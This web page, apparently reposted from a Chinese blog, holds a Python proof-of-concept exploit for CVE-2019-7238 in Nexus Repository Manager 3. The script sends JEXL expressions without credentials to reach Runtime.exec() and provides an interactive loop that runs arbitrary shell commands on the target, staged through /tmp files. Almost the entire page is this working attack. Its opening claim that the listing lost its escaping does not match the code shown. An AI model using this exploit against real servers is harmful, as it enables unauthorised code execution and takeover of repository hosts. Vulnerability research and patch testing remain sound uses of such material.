  • CVE-2019-7238 PoC — Nexus Repository Manager 3 remote code execution. The `coreui_Component.previewAssets` ExtDirect method at `/service/extdirect` evaluates the JEXL content-selector `expression` sent in the request body (the script sends it with no credentials), and the PoC uses that to reach `java.lang.Runtime.exec()`. Note that the listing below is a rendered copy that lost its Python escaping: the `\"` around the `exec()` argument inside each JEXL string and the `"""` around the banner are missing, so it does not run as shown — use the GitHub link at the end of the page for the canonical script.

    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    import urllib3
    import requests
    import base64
    import json
    import sys
    
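    # Banner. The text spans several lines, so it must be a triple-quoted
    # literal; a plain "..." literal here is a syntax error.
    print("""
    Nexus Repository Manager 3 Remote Code Execution - CVE-2019-7238 
    Found by @Rico and @voidfyoo
    """)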
    
    # Optional proxy map handed to every requests.post() call, e.g.
    # {"http": "http://127.0.0.1:8080"} to watch the traffic in Burp.
    # Empty means connect to the target directly.
    proxy = {}

    # Base URL of the target Nexus Repository Manager 3 instance, without a
    # trailing slash: "/service/extdirect" is appended to it by each request.
    remote = "http://127.0.0.1:8081"

    # Selects the payload strategy in the command loop: "LINUX" stages the
    # command on disk and runs it via bash; any other value ("WIN") passes
    # the command string straight to Runtime.exec().
    ARCH = "LINUX"  # or "WIN"
    
    # Every request below uses verify=False (the PoC accepts self-signed TLS on
    # the target), so silence the InsecureRequestWarning it would otherwise
    # print on each call. NOTE(review): both calls are presumably kept because
    # on some requests releases requests.packages.urllib3 is a vendored copy
    # distinct from the top-level urllib3 module -- confirm before merging them.
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
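    def checkSuccess(r):
        """Validate a previewAssets response and abort the script on failure.

        Args:
            r: the HTTP response; only ``status_code`` and ``text`` are read,
               so any object exposing those two attributes works.

        Returns:
            True when the server answered 200 with ``result.total > 0``
            (printed as "OK").

        Raises:
            SystemExit: with status 1 on a non-200 response, on a body that is
                not JSON of the shape ``{"result": {"total": N}}`` (login page,
                WAF block, ExtDirect error envelope), or when ``total`` is 0
                (printed as "KO").

        NOTE(review): ``result.total`` is the number of assets the content
        selector matched, so it is only an indirect sign that the JEXL
        expression was evaluated; a Nexus instance holding no assets would
        presumably report "KO" even when the expression ran. Confirm before
        reading "KO" as "not vulnerable".
        """
        if r.status_code != 200:
            print("[-] Error status code", r.status_code)
            sys.exit(1)
        try:
            total = json.loads(r.text)['result']['total']
        except (ValueError, KeyError, TypeError):
            # Not the expected envelope: surface a bounded excerpt instead of
            # dying with a traceback inside json.loads or a KeyError.
            print("[-] Unexpected response body:", r.text[:200])
            sys.exit(1)
        if total > 0:
            print("OK")
            return True
        print("KO")
        sys.exit(1)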
    
    
    print("[+] Checking if Content-Selectors exist =>", end=' ')
    # Probe step: a harmless JEXL expression ("1==1") filtered over every
    # repository. A non-empty asset list shows the server evaluated the
    # expression before any exec() payload is sent. Traffic is sent with
    # verify=False, so TLS errors on the target are ignored on purpose.
    probe_url = remote + "/service/extdirect"
    probe_headers = {"Content-Type": "application/json"}
    probe_filter = [
        {"property": "repositoryName", "value": "*"},
        {"property": "expression", "value": "1==1"},
        {"property": "type", "value": "jexl"},
    ]
    probe_json = {
        "action": "coreui_Component",
        "data": [{
            "filter": probe_filter,
            "limit": 50,
            "page": 1,
            "sort": [{"direction": "ASC", "property": "name"}],
            "start": 0,
        }],
        "method": "previewAssets",
        "tid": 18,
        "type": "rpc",
    }
    r = requests.post(probe_url, headers=probe_headers, json=probe_json,
                      proxies=proxy, verify=False, allow_redirects=False)
    checkSuccess(r)
    print("")
    
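    def _jexl_exec(label, cmd):
        """Send one previewAssets request whose JEXL filter runs ``cmd``.

        Prints *label*, POSTs the payload to ``remote`` and hands the response
        to checkSuccess(), which exits the script on any non-OK result.

        The command goes through Java's Runtime.exec(String), which splits the
        string on whitespace and runs no shell, so a payload must not rely on
        quoting, pipes or redirection at this level; the Linux path below
        delegates those to bash via a staged file instead.

        *cmd* is interpolated into a double-quoted JEXL string literal, so it
        must not itself contain a double quote.
        """
        print(label, end=' ')
        expression = (
            "1==0 or ''.class.forName('java.lang.Runtime')"
            ".getRuntime().exec(\"" + cmd + "\")"
        )
        payload = {
            "action": "coreui_Component",
            "data": [{
                "filter": [
                    {"property": "repositoryName", "value": "*"},
                    {"property": "expression", "value": expression},
                    {"property": "type", "value": "jexl"},
                ],
                "limit": 50,
                "page": 1,
                "sort": [{"direction": "ASC", "property": "name"}],
                "start": 0,
            }],
            "method": "previewAssets",
            "tid": 18,
            "type": "rpc",
        }
        resp = requests.post(remote + "/service/extdirect",
                             headers={"Content-Type": "application/json"},
                             json=payload, proxies=proxy, verify=False,
                             allow_redirects=False)
        checkSuccess(resp)

    # Interactive loop: each command is fired blind (its output is never
    # returned to us). Ctrl-C or Ctrl-D (EOF on stdin) ends the session
    # cleanly instead of dying with a traceback.
    while True:
        try:
            command = input("command (not reflected)> ")
            if ARCH == "LINUX":
                # Runtime.exec() offers no shell, so the command is staged on
                # disk: copy /etc/passwd to /tmp/passwd as a seed file, reduce
                # it to the single marker line "pwn2", replace the marker with
                # a one-line base64 decoder (brace expansion {a,b} stands in
                # for the spaces exec() would split on), run that file with
                # bash to drop the real command into pwn.txt, then run pwn.txt.
                #
                # The sed substitution uses '#' as its delimiter because '/'
                # is part of the base64 alphabet; the earlier version rewrote
                # '/' to '+' and silently corrupted any command whose encoding
                # contained a '/'.
                #
                # NOTE: /tmp/passwd and pwn.txt (in the Nexus working
                # directory) are left behind; clean them up after a test.
                b64 = base64.b64encode(command.encode('utf-8')).decode('ascii')
                _jexl_exec("[+] Copy file to temp directory =>",
                           "cp /etc/passwd  /tmp/passwd")
                _jexl_exec("[+] Preparing temp file =>",
                           "sed -i 1cpwn2  /tmp/passwd")
                _jexl_exec("[+] Cleaning temp file =>",
                           "sed -i /[^pwn2]/d /tmp/passwd")
                _jexl_exec("[+] Writing command into temp file =>",
                           "sed -i 1s#pwn2#{echo," + b64
                           + "}|{base64,-d}>pwn.txt#g /tmp/passwd")
                _jexl_exec("[+] Decode base64 command =>", "bash /tmp/passwd")
                _jexl_exec("[+] Executing command =>", "bash pwn.txt")
            else:
                # Windows path: the raw command string is passed straight to
                # Runtime.exec(); no shell, whitespace-split, no quotes allowed.
                _jexl_exec("[+] Executing command =>", command)
            print('')
        except (KeyboardInterrupt, EOFError):
            print("Exiting...")
            break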
    

    脚本地址 (canonical, correctly escaped copy of the script; the listing on this page lost the `\"` escapes inside the JEXL strings and the triple quotes around the banner, so copy from here): https://github.com/mpgn/CVE-2019-7238/blob/master/CVE-2019-7238.py

    漏洞分析:https://cert.360.cn/report/detail?id=3ec687ec01cccd0854e2706590ddc215

  • 原文地址:https://www.cnblogs.com/junsec/p/11711832.html